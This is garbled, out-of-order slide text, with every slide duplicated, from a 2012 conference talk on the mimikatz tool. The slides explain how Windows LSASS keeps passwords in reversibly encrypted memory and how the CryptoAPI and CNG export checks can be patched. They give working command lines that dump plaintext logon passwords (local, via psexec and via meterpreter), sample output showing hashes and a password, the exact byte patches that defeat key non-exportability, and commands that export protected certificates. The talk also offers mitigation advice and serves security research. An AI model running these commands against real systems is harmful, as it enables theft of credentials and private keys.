Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
